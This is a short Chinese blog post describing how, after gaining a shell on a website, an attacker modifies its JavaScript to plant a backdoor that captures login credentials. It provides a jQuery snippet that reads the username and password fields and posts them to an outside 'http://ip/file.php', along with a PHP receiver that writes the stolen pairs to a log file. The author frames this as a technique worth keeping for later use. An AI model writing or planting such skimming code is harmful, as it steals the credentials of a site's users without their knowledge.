Js留后门获取账号密码

前言

最近看到一个文章，通过拿shell后修改JS源码留个获取账号密码的后门，感觉挺有用的，以后应该用的上

Demo

简单记录下ajax的语言

function demo(){

    username = $("input[name='username']").val();

    password = $("input[name='password']").val();

$.ajax({

            type:'post',

            url:'http://ip/file.php',

            async:false,

            data:'user='+username+'&pass='+password,

            success:function(msg){

            }

    });

}

接受php.demo

<?php

    header('Access-Control-Allow-Origin:*');

    $user = @$_POST['user'];

    $pass = @$_POST['pass'];

    echo $user; //我加的，我用来测试是否能接收到数据。

    $myfile = fopen("testfile.txt","a+");

    fwrite($myfile, $user."---".$pass."\r\n");

    fclose($myfile);
?>

posted @ 2021-03-15 20:56 yunying 阅读(500) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

云影

正在努力的Yunying

Js留后门获取账号密码

前言

Demo

公告